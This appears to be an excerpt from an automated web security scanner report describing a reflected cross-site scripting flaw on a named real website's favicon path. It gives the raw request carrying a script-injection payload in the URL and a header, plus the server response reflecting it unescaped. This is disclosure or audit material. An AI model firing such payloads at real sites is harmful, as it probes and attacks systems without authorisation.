1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.geni.com |
Path: | /favicon.ico |
GET /favicon.icoc5ea6"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.geni.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Fri, 01 Apr 2011 01:50:48 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 404 Not Found Content-Length: 18191 Cache-Control: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="join_return_to" name="return_to" value="/favicon.icoc5ea6"><script>alert(1)< ...[SNIP]... |